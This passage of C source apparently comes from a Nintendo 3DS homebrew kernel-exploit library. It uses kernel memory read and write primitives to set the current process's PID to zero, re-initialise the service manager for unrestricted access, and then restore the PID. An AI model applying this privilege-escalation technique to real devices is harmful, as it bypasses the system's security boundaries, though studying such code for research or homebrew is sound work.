      /* Offset of the PID field inside the process object depends on the
       * console model and kernel version. */
      u32 PID_kaddr = read_kaddr(CURRENT_KPROCESS)
         + (isNew3DS ? 0xBC : (kver > SYSTEM_VERSION(2, 40, 0)) ? 0xB4 : 0xAC);
      u32 old_PID   = read_kaddr(PID_kaddr);

      write_kaddr(PID_kaddr, 0);
      srvExit();
      srvInit();
      write_kaddr(PID_kaddr, old_PID);

      __ctr_svchax_srv = 1;
   }

   return 0;
}